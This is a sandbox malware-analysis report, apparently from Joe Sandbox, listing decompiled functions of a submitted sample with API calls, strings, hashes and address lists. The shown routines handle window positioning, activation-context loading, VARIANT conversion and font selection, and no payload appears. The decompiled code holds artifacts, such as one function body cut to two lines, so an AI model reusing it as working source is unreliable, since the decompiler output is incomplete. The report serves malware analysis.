Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
Instruction ID: b37fad4d356144a07009b57323d5ed8e9dfbb1bd6742926c0fb4062ff0804fd9
Opcode Fuzzy Hash: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
Instruction Fuzzy Hash: 04F18C31910206EBDF21AF65C8A4BEF7BA5AF44354F14402FE815A72A1DB3C9DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040966B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040966B(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E0040C981(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E00407923(_t121, E004078B8(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E00403ED6();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E00407923(_t121, E004078B8(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E0040CC5E(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x0040966b
0x0040966b
0x00409672
0x00409675
0x0040967d
0x00409680
0x00409685
0x00409693
0x004096a5
0x00409695
0x00409698
0x00409698
0x004096ab
0x004096af
0x004096bb
0x004096c3
0x004096c5
0x004096c5
0x004096c3
0x00409687
0x00409687
0x00409687
0x00409687
0x004096c7
0x004096d5
0x004096de
0x0040977e
0x00409785
0x0040978c
0x00409796
0x004096e4
0x004096e6
0x004096eb
0x004096f6
0x004096ff
0x004096ff
0x004096f6
0x00409703
0x0040970a
0x0040974b
0x0040975a
0x00409767
0x0040970c
0x0040970c
0x00409713
0x00409715
0x00409715
0x00409725
0x00409738
0x00409742
0x00409742
0x0040970a
0x004097a5
0x004097aa
0x004097af
0x004097b3
0x004097b6
0x004097bd
0x004097c5
0x004097cd
0x004097d5
0x004097dc
0x004097e1
0x004097ed
0x004097f5
0x004097f5
0x004097e3
0x004097e3
0x004097e3
0x004097fb
0x0040980a
0x00409812
0x00409812
0x004097fd
0x004097fd
0x004097fd
0x0040982a

APIs

Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C

GetParent.USER32(?), ref: 00409698
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004096BB
GetWindowRect.USER32 ref: 004096D5
GetWindowLongA.USER32 ref: 004096EB
CopyRect.USER32 ref: 00409738
CopyRect.USER32 ref: 00409742
GetWindowRect.USER32 ref: 0040974B
CopyRect.USER32 ref: 00409767

Strings

(, xrefs: 00409703

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
Instruction ID: bc6882baaa5189169e0c0b7d53e15d52d0ad1cceba646d15ad8487012d1c9b7f
Opcode Fuzzy Hash: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
Instruction Fuzzy Hash: 39513072910219ABDB00DFA8CD85EEEBBB9AF88314F154136F905F3291D734AD41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D31B, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D31B(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
				void* _v8;
				void* _v20;
				void* _t16;

				_t16 = __ecx;
				_a100 = _a100 + __edx;
			}

0x0040d31b
0x0040d320

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0040D349
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0040D35B
GetProcAddress.KERNEL32(ActivateActCtx), ref: 0040D36D
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0040D37F

Strings

KERNEL32, xrefs: 0040D323
CreateActCtxW, xrefs: 0040D343
ReleaseActCtx, xrefs: 0040D34B
DeactivateActCtx, xrefs: 0040D36F
$dD, xrefs: 0040D31B
ActivateActCtx, xrefs: 0040D35D

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: $dD$ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-1206286444
Opcode ID: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
Instruction ID: 8662d49a9f014bf3ccbdae78ec47047f6782647d52dd8aec524ec0572c096a73
Opcode Fuzzy Hash: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
Instruction Fuzzy Hash: EDF0F8B8945320AFCF109F71BD09A897EE8E60F7917225077A400A3266D67991008E9F

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDF7, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041BDF7(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E0041F789(E00433621, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E0040DBE0(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t190 = lstrlenA( *(_t195 - 0x18));
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_t127 = E00401060(_t185,  *(_t191 + 8) << 4);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E0041E5F0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E0041F330(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E0041B5F0(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_t135 = E00401060(_t185, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E0041F7E5(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E0040D3B7();
							goto L7;
						}
						E0041E5F0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x437058;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_t57 = _t195 - 0x58; // 0x437058
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E0041BB0F(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t85 = _t195 - 0x58; // 0x437058
								_t179 = _t85;
								if( *(_t195 - 0x18) == 0) {
									E0041B9A1(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E0041B9F7(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E0040D3B7();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M0041C107))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E0041B9F7(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E0040D3B7();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E0041D49C();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E0041D49C();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E0041D49C();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E0041D49C();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				if(E00401060(_t185, _t19) != 0) {
					E0041E5F0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E00402FAA(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

0x0041bdf7
0x0041bdf7
0x0041bdf7
0x0041bdfe
0x0041be03
0x0041be0c
0x0041be11
0x0041be14
0x0041be17
0x0041be1b
0x0041be1e
0x0041be22
0x0041be25
0x0041be2a
0x0041be2a
0x0041be3a
0x0041be3f
0x0041be46
0x0041be49
0x0041bebd
0x0041bebd
0x0041bec7
0x0041becc
0x0041bece
0x0041becf
0x0041bee0
0x0041bee3
0x0041bee9
0x00000000
0x00000000
0x0041beeb
0x0041bef0
0x0041bef5
0x0041bef8
0x0041bf00
0x0041bf05
0x0041bf13
0x0041bf15
0x0041bf15
0x0041bf19
0x0041bf1e
0x0041bf21
0x0041be59
0x0041be59
0x0041be61
0x0041be6d
0x0041c0fa
0x0041c102
0x0041c102
0x0041be63
0x0041be66
0x0041be68
0x0041be68
0x00000000
0x0041be68
0x0041bf29
0x0041bf2e
0x0041bf31
0x0041bf33
0x0041bf35
0x0041bf3c
0x0041bf3f
0x0041bf42
0x0041bf45
0x0041bf4b
0x0041bf4f
0x0041bf55
0x0041bf58
0x0041bf5c
0x0041bf5f
0x0041bf62
0x0041bf63
0x0041bf66
0x0041bf67
0x0041bf6c
0x0041bf6e
0x0041bf71
0x0041bfcc
0x0041bfcc
0x0041bfcf
0x0041bfd1
0x0041bfd4
0x0041bfef
0x0041bfef
0x0041bff3
0x0041bff3
0x0041bff6
0x0041c043
0x0041c048
0x0041c04b
0x0041c04d
0x0041c0a9
0x0041c0a9
0x0041c0ac
0x0041c0d2
0x0041c0d8
0x0041c0db
0x0041c0df
0x0041c0e4
0x0041c0e8
0x0041c0ec
0x0041c0ee
0x0041c0f1
0x0041c0f3
0x0041c0f3
0x0041c0f8
0x00000000
0x0041c0f8
0x0041c0ae
0x0041c0ae
0x0041c0af
0x0041c0b9
0x0041c0b9
0x0041c0bb
0x0041c0c0
0x0041c0c0
0x00000000
0x0041c0bb
0x0041c0b1
0x0041c0b1
0x0041c0b4
0x0041c0c9
0x00000000
0x0041c0c9
0x0041c0b6
0x0041c0b7
0x00000000
0x00000000
0x00000000
0x0041c0b7
0x0041c04f
0x0041c052
0x0041c058
0x0041c05b
0x0041c05e
0x00000000
0x00000000
0x0041c060
0x00000000
0x0041c08f
0x0041c08f
0x00000000
0x00000000
0x0041c0a0
0x00000000
0x00000000
0x0041c07d
0x00000000
0x00000000
0x0041c085
0x00000000
0x00000000
0x0041c06c
0x0041c06f
0x0041c072
0x0041c075
0x00000000
0x00000000
0x0041c08a
0x0041c08d
0x00000000
0x00000000
0x0041c095
0x0041c098
0x0041c09a
0x0041c09b
0x0041c09c
0x0041c09d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c067
0x00000000
0x00000000
0x0041c060
0x0041bff8
0x0041bffc
0x0041c001
0x0041c005
0x0041c009
0x0041c00b
0x0041c00e
0x0041c010
0x0041c010
0x00000000
0x0041c015
0x0041bfdc
0x0041bfdf
0x0041bfe5
0x0041bfe9
0x0041bfea
0x0041bfea
0x00000000
0x0041bfdc
0x0041bf73
0x0041bf77
0x0041bf7a
0x0041bf7b
0x0041bf7c
0x0041bf7f
0x0041bf83
0x0041bfb7
0x0041bfbc
0x0041bfc2
0x0041bfc5
0x0041bfc5
0x00000000
0x0041bfc5
0x0041bf85
0x0041bf88
0x0041bfad
0x0041bfad
0x0041bfb2
0x00000000
0x0041bfb2
0x0041bf8a
0x0041bf8d
0x00000000
0x00000000
0x0041bf92
0x0041bf95
0x0041bfa9
0x0041bf97
0x0041bf9c
0x0041bf9f
0x0041bf9f
0x00000000
0x0041bf95
0x0041bed1
0x0041bed1
0x0041bed5
0x0041bed8
0x00000000
0x00000000
0x0041beda
0x0041bedd
0x00000000
0x0041bedd
0x0041be4b
0x0041be4b
0x0041be57
0x0041be79
0x0041be7e
0x0041be81
0x0041be87
0x0041be8c
0x0041be91
0x0041be95
0x0041be98
0x0041be9c
0x0041be9f
0x0041bea3
0x0041bea3
0x0041bea4
0x0041bea8
0x0041beac
0x0041bead
0x0041beb0
0x0041beb8
0x0041bebb
0x0041bebb
0x00000000
0x0041bebb
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041BDFE
lstrlenA.KERNEL32(00000000,000000FF,00000050,00410F22,00000000,00000001,?,?,000000FF,?,?,?), ref: 0041BE30
__alloca_probe_16.LIBCMT ref: 0041BE79

Part of subcall function 00402FAA: _memcpy_s.LIBCMT ref: 00402FBA

__alloca_probe_16.LIBCMT ref: 0041BEF0
_memset.LIBCMT ref: 0041BF00
__alloca_probe_16.LIBCMT ref: 0041BF29
VariantClear.OLEAUT32(?), ref: 0041BFDF

Strings

XpC, xrefs: 0041BF4B, 0041BF4E

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID: XpC
API String ID: 2586305615-1560596422
Opcode ID: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
Instruction ID: fa49f027109238ab1e2c7d572b865a3b51314bf543938ae7db15aad6909c8791
Opcode Fuzzy Hash: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
Instruction Fuzzy Hash: EFA19B70800209DBCF11DFE9C885AEEBFB1FF08314F24815AE515B7291D7399A86DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403901, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403901(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x444a68; // 0x1
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E004037E3(0, _t12, _t15, _t16, _t20);
					}
					 *0x444a58 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x444a5c = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x444a60 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x444a58; // 0x747be4f0
					 *0x444a64 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x444a5c; // 0x74787540
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x444a60; // 0x74787510
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x444a5c; // 0x74787540
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x444a60; // 0x74787510
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x444a68 = 1;
				}
				return _t18;
			}

0x00403901
0x00403901
0x00403907
0x0040390b
0x0040390e
0x00403911
0x00403918
0x00403929
0x0040392b
0x0040392d
0x0040392f
0x0040392f
0x0040392f
0x00403949
0x00403956
0x00403963
0x00403968
0x0040396a
0x00403970
0x00403975
0x00403976
0x0040398e
0x00403994
0x00000000
0x00403996
0x00403996
0x0040399c
0x00000000
0x0040399e
0x0040399e
0x004039a0
0x00000000
0x00000000
0x004039a0
0x0040399c
0x00403978
0x00403978
0x0040397e
0x00000000
0x00403980
0x00403980
0x00403986
0x00000000
0x00403988
0x00403988
0x0040398a
0x00000000
0x0040398c
0x0040398a
0x00403986
0x0040397e
0x004039a2
0x004039a2
0x004039ae

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,004043B9,000000FF), ref: 00403923
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00403941
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040394E
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040395B
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00403968

Strings

KERNEL32, xrefs: 0040391E
CreateActCtxA, xrefs: 0040393B
ReleaseActCtx, xrefs: 00403943
DeactivateActCtx, xrefs: 0040395D
ActivateActCtx, xrefs: 00403950

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
Instruction ID: 27b4460d09b63384aa497d3741584d63de93aff5ce20b31730bd6aa59633142a
Opcode Fuzzy Hash: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
Instruction Fuzzy Hash: 0011C2B59816889FCB20DFA9AC80716BFFCA6D6706710503FE141B2660D6B80A40CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00410BD8(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x443590; // 0xa920217c
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E0041E5DF(E00410A89(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00410bde
0x00410be5
0x00410bea
0x00410bf3
0x00410bf6
0x00410bf9
0x00410bfe
0x00410c02
0x00410c0c
0x00410c1b
0x00410c1f
0x00410c2c
0x00410c2e
0x00410c30
0x00410c30
0x00410c4b
0x00410c4e
0x00410c4e
0x00410c54
0x00410c54
0x00410c5a
0x00410c5c
0x00410c5c
0x00410c77
0x00410c77
0x00410c06
0x00410c0a
